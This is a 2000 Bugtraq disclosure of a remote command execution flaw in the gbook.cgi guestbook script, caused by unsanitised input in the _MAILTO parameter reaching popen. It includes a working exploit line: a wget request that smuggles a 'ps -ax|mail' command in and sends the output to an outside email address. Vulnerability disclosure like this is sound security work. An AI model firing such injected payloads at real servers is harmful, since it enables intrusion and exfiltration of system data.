[17585] in bugtraq
[hacksware] gbook.cgi remote command execution vulnerability
daemon@ATHENA.MIT.EDU (JW Oh)
Fri Nov 10 12:53:58 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.30.0011102036130.24529-100000@ivntech.com>
Date: Fri, 10 Nov 2000 20:38:44 +0900
Reply-To: JW Oh <mat@IVNTECH.COM>
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Bug Report
1. Name: gbook.cgi remote command execution vulnerability
2. Release Date: 2000.11.10
3. Affected Application:
GBook - A web site guestbook
By Bill Kendrick
kendrick@zippy.sonoma.edu
http://zippy.sonoma.edu/kendrick/
4. Author: mat@hacksware.com
5. Type: Input validation Error
6. Explanation
gbook.cgi is used by some web sites.
We can set _MAILTO parameter, and popen is called to execute mail command.
If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
It's so trivial. :)
7. Exploits
This exploit executes "ps -ax" command and sends the result to haha@yaho.com.
wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"
=================================================
| mat@hacksware.com |
| http://hacksware.com |
=================================================
